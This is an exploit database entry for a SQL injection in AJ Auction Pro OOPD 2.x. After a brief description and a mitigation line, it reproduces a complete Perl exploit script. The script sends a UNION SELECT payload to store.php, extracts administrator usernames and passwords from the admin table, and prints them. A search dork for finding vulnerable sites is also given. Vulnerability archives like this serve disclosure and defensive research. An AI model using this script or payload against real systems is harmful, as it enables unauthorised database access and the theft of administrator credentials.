AJ Auction Pro OOPD 2.x SQL Injection Exploit

vendor:

AJ Auction Pro OOPD

by:

NoGe

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: AJ Auction Pro OOPD

Affected Version From: 2.x

Affected Version To: 2.x

Patch Exists: NO

Related CWE: N/A

CPE: a:ajsquare:aj_auction_pro_oopd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AJ Auction Pro OOPD 2.x SQL Injection Exploit

AJ Auction Pro OOPD 2.x is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the application's database and potentially gain access to sensitive information such as usernames and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl

#********************************************************#
#                                                        #
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit      #
#      Software : AJ Auction Pro OOPD 2.x                #
#      Vendor   : http://www.ajsquare.com/               #
#      Author   : NoGe                                   #
#      Contact  : noge[dot]code[at]gmail[dot]com         #
#      Blog     : http://evilc0de.blogspot.com           #
#                                                        #
# [o] Usage                                              #
#      root@noge:~# perl ajpro.pl www.target.com         #
#                                                        #
# [o] Dork                                               #
#      "Powered By AJ Auction Pro"                       #
#                                                        #
# [o] Greetz                                             #
#      MainHack BrotherHood [ http://mainhack.net ]      #
#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang   #
#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella #
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke     #
#                                                        #
#********************************************************#

use HTTP::Request;
use LWP::UserAgent;

my $target = $ARGV[0];
my $file_vuln = '/store.php?id=';
my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';
print "\n[x]===============================================[x]\n";
print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";
print "[x]                [C]oded By NoGe                [x]\n";
print "[x]===============================================[x]\n\n";

my $exploit = "http://".$target.$file_vuln.$sql_query;

my $request   = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
my $res   = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }

# milw0rm.com [2009-08-18]